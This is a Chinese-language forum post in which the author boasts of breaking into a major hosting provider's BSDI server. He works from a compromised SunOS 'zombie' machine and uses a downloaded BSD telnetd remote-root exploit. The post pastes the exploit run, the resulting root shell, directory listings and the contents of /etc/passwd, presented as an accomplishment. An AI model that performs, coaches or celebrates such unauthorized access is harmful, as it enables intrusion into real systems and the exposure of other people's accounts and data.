|
 | 作者: jwm3337 [jwm3337]
 论坛用户 |
登录 |
今天去hack.co.za混的时候,看见前几天那个*bsd telnetd漏洞的exploit已经出了,就立即把他down下来。突然想起XX(号称:中国第一大IDC服务提供商)那也是用BSDI做系统的,就去测试一下。 telnet xxx.xxx.xxx.xxx //telnet上肉鸡再说~ SunOS 5.8 //羡慕?! login: xxx Password: Login incorrect //打错密码了! login: zym Password: Last login: Sun Jul 29 19:37:19 from 61.140.253.101 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 $ //ok~well~ 把exploit FTP上去! 然后,telnet一下XX主机: $ telnet 211.99.xxx.xx Trying 211.99.xxx.xx... Connected to 211.99.xxx.xx. Escape character is '^]'. BSDI BSD/OS 4.1 (cb-k6) (ttyp2) login: 噢~原来是BSDI BSD/OS 4.1! 我们开始吧! $ ./test 211.99.xxx.xx 7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut. check: PASSED, using 16mb mode ############################################################ ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then, there is no other way, sorry... ## setting populators to populate heap address space ## number of setenvs (dots / network): 31500 ## number of walks (percentage / cpu): 0 ## ## the percentage is more realistic than the dots ;) percent |--------------------------------------------------------| ETA | 79.01% |................................................. | 00:01:05 | command: �? /  od job!!!成功了!command: �?id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff) set PS1=# OPTIND=1 PS2=》 PATH=/bin:/usr/bin IFS= cd / ls .base-4.1 .profile .sentinel README.CIVILINK a admin admin_nfs amd bin bkroot bkusr boot bsd cdrom dev disk2 etc include lib linux login.core login_krb-or-pwd.core man mnt nsr popper.core root sbin sco shlib sys telnetd.core tftpboot tmp usr var cd usr cd home cd admin ls .bash_history .cshrc @LongLink DBI-1.13 DBI-1_13_tar Data-Dumper-2.09 Data-Dumper-2_09_tar Msql-Mysql-modules-1.2209 Msql-Mysql-modules-1_2209_tar ServerType WRONG apache_1.3.12 apache_1.3.12.tar bash.core batch_mkvirt.pl bigfile bin cgi.tar client.tar cnhack.org.tar //怎么会有这个?! controlpanelV1.2-normal controlpanelV1.2-normal.tar dbi.tar disk_info disk_sd0 env.cgi fornew fp40.bsdi.tar frontpage fsck.core gmake-3.74.tar hacked htst index.html install install_1.1c_release.tar install_log ji legato libmysqlclient.a lizs local make-3.74 man_perlfunc mkvirt.log mysql-3.22.32 mysql-3_22_32_tar old_command php-4.0.1pl2 php-4.0.1pl2.tar putfl renew.tar script script2 script_sd1 script_sd2 script_sd3 sendmail.up suexec tar-1.13 tar-1.13.tar test trans update_mail users cat /etc/passwd root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: oracle:x:1001:200::/home/oracle:/bin/sh ue:x:1001:200::/home/oracle:/bin/sh cuijia:x:1002:10::/home/cuijia:/bin/sh ephone:x:1003:10::/usr/ephone:/bin/csh www:x:1004:10::/oracle/www:/bin/sh zym:x:1005:10::/home/zym:/bin/sh zzyok:x:1006:10::/home/oracle:/bin/sh ………… exit read remote: Interrupted system call $ |
| 地主 发表时间: 09/21 13:02 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 我是如何进入万网的!!!!!!!!!!!!!!!!